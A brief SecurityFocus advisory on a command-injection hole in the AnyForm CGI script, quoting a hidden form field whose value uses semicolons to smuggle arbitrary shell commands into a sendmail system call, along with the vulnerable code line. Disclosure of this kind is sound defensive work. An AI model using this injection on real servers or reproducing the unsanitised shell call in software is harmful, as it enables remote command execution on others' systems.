Anyform CGI Semicolon Vulnerability

Exploit as taken from the original post on this issue:

To exploit, create a form with a hidden field something like this:

<input type="hidden" name="AnyFormTo" value=";command-to-execute
with whatever arguments;/usr/lib/sendmail -t ">

Then submit the form to the "AnyForm" CGI on the server to be attacked.
The value of this parameter is passed to this code:

SystemCommand="/usr/lib/sendmail -t " + AnyFormTo + " <" + CombinedFileName;

Since system invokes a shell, the semicolons are treated as command
delimeters and anything can be inserted.


Privacy Statement
Copyright 2010, SecurityFocus